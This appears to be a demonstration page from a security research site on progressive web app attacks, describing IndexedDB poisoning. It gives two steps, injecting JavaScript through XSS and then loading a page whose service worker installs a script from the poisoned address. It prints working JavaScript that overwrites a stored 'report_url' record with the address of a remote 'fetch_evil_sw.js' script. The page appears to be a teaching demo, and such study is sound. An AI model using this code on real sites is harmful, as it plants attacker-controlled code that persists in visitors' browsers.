IndexDB Poisoning

To test this attack, Follow the below steps

1. Poison the IndexDB by executing Malcious code via XSS (simply invoke the malicious JS function)
2. Visit a target page that will install SW that will install script from poisoned URL

Below is the code to poison the db URL

			
function modify_indexDB(){
      const request = indexedDB.open('demo_db', 1);
      request.onsuccess = (event) => {
	     var db = event.target.result;
	     var txn = db.transaction('urls','readwrite')
	     txn.onsuccess =  function(ev){
		 alert('URL Modified!!. Reload Page')
	     }
	     var store = txn.objectStore('urls')
	     // delete current record in DB and insert URL of malicious script
	     store.delete('report_url').onsuccess = ev => {
		 var db_op_req = store.put({'id':'report_url', 'url':'https://demopwa.github.io/SW_Attacks/helper_scripts/fetch_evil_sw.js'})
	  }
      }
  }
			
		

Click this link to visit the target page!!

Go to Target Page